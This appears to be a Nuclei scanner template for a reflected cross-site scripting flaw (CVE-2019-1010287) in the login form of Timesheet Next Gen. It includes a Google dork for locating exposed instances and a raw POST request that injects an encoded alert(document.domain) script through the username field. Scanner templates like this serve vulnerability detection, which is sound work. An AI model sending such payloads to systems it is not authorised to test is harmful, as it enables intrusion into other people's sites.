id: CVE-2019-1010287 info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu severity: medium description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-1010287 cwe-id: CWE-79 metadata: google-dork: inurl:"/timesheet/login.php" tags: cve,cve2019,timesheet,xss requests: - raw: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login matchers-condition: and matchers: - type: status status: - 200 - type: word words: - '>' part: body